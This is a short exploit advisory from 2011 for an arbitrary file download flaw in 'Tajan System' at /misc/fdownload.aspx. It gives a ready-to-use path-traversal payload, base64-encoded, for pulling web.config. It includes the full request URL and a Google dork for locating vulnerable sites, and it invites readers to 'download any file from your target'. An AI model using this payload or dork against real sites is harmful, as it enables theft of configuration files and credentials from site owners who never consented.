++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] Author    : St493r
[#] Contact   : St493r@gmail.com
[#] Title     : Tajan System Arbitrary File Download Vulnerability
[#] Tested On : Linux
[#] Date      : 28 - 09 - 2011
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] Vulnerability File : /misc/fdownload.aspx
[#] Exploit            : Fdwonload.aspx download files  from  3  directory
                         after root directory , So for download web.config  
                         We shoud back to 3 directory and then encode our
						 path to base-64.
[#] Example            : Download web.config :
/../../../web.config = Ly4uLy4uLy4uL3dlYi5jb25maWc=
/misc/fdownload.aspx?dp=Ly4uLy4uLy4uL3dlYi5jb25maWc=

You can download any file from your target ;)
						 
Google dork : inurl:/misc/fdownload.aspx						 
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] Thanks To All Iranian Hackers
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++